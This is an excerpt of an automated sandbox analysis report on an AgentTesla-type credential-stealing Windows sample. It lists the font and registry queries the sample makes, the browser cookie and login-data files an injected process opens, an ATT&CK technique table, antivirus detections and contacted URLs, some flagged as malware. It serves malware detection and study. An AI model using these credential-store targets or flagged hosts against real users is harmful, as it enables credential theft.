            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\isoburn.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Windows Management Instrumentation | Path Interception | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 4 Ingress Tool Transfer | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials |
| Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 5 Non-Application Layer Protocol | | | Data Encrypted for Impact | DNS Server | Email Addresses |
| Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 5 Application Layer Protocol | | | Data Destruction | Virtual Private Server | Employee Names |
| Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels | | | Data Encrypted for Impact | Server | Gather Victim Network Information |
| Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties |
| External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS |


| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| WrrCV4QR2J.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
| WrrCV4QR2J.exe | 100% | Avira | TR/AD.Swotter.ladfk | |
| WrrCV4QR2J.exe | 100% | Joe Sandbox ML | | |

            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                                                            high
                                                                            http://www.founder.com.cn/cn/cTheWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://hm.baidu.com/hm.js?isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.galapagosdesign.com/DPleaseWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.transip.nl/vragen/198/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.urwpp.deDPleaseWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.zhongyicts.com.cnWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.reg.ru/service/prolong_period_anonymous?servtype=srv_hosting_ispmgr&amp;dname_or_ip=isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://cdn.jsinit.directfwd.com/sk-jspark_init.phpisoburn.exe, 00000004.00000002.4122089347.0000000005086000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002B16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2011901492.00000000388F6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://mozilla.org0/isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.ecosia.org/newtab/isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.carterandcone.comlWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://trustpilot.com/review/www.transip.nlisoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.transip.nl/vragen/110000580/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.com/designers/frere-user.htmlWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://files.reg.ru/fonts/inter/Inter-Medium.woff)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.reg.ru/hostingUHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.transip.nl/vragen/110000572isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://parkcloud.dynadot.com/logo.gifisoburn.exe, 00000004.00000002.4122089347.00000000053AA000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002E3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://files.reg.ru/fonts/inter/Inter-Regular.woff2)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.cssisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.transip.eu/terms-of-service/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.npstore.asiaUHPrrMeffyCaz.exe, 00000006.00000002.4122987112.0000000004ABE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://reg.ru?target=_blankisoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.com/designersGWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.fontbureau.com/designers/?WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.founder.com.cn/cn/bTheWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.fontbureau.com/designers?WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.transip.eu/knowledgebase/zoeken/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnLisoburn.exe, 00000004.00000002.4122089347.0000000006682000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000004112000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.tiro.comWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.transip.nl/services/search-domains/UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.goodfont.co.krWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.typography.netDWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.galapagosdesign.com/staff/dennis.htmWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://files.reg.ru/fonts/inter/Inter-Regular.woff)isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://nl.trustpilot.com/review/www.transip.nlisoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.transip.eu/question/110000577/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://transip.nl/cp/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.transip.nl/algemene-voorwaarden/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.fonts.comWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.sandoll.co.krWrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.transip.nl/privacy-policy/isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Zisoburn.exe, 00000004.00000002.4122089347.00000000061CC000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003C5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          http://www.sakkal.comWrrCV4QR2J.exe, 00000000.00000002.1686390703.0000000005980000.00000004.00000020.00020000.00000000.sdmp, WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
